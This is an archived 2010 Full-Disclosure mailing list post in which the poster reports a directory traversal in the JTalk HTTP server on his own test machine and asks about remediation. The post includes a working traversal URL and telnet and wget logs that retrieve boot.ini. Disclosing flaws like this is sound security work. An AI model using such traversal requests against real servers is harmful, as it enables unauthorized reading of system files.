lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AANLkTimmlowX7IgqT7qbBLuwiTHsMrLXnEqgIMpR7Zmg@mail.gmail.com>
Date: Thu, 1 Jul 2010 02:26:29 +0530
From: rapper crazy <rappercrazzy@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Directory Traversal on JTalk HTTP Server

Hello All,

Does anyone know of any Directory Traversal issue with Jtalk HTTP server?

I was testing one of my machine and found directory traversal on it.
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini

Tried to enumerate the version but failed, attached below are the logs -
=============Header enumeration=============
[jt@...Box]$ telnet 192.168.10.120 80
Trying 192.168.10.120...
Connected to 192.168.10.120 (192.168.10.120).
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 404 Not Found
Server: JTALKServer
Allow: GET
Content-Type: text/html
Content-Length:87

<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>HTTP Error 404</H1>
<H4>Not Found</H4>
</BODY>
</HTML>Connection closed by foreign host.
==============End Header Enumeration===============


Attached below are the logs for wget when I downloaded the boot.ini file

=========wget logs==============
[jt@...Box]$ wget
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
--2010-06-30 15:58:45--
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
Connecting to 192.168.10.120:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 208 [application/octet-stream]
Saving to: `boot.ini'

100%[====================================================================================================================>]
208         --.-K/s   in 0s

2010-06-30 15:58:45 (10.9 MB/s) - `boot.ini' saved [208/208]

[jt@...Box]$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard"
/noexecute=optout /fastdetect
[jt@...Box]$

============end of logs=====================


So my question is does anyone know of any such issue? What could be the
remediation apart from disabling the service?

Thanks
Joshua

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ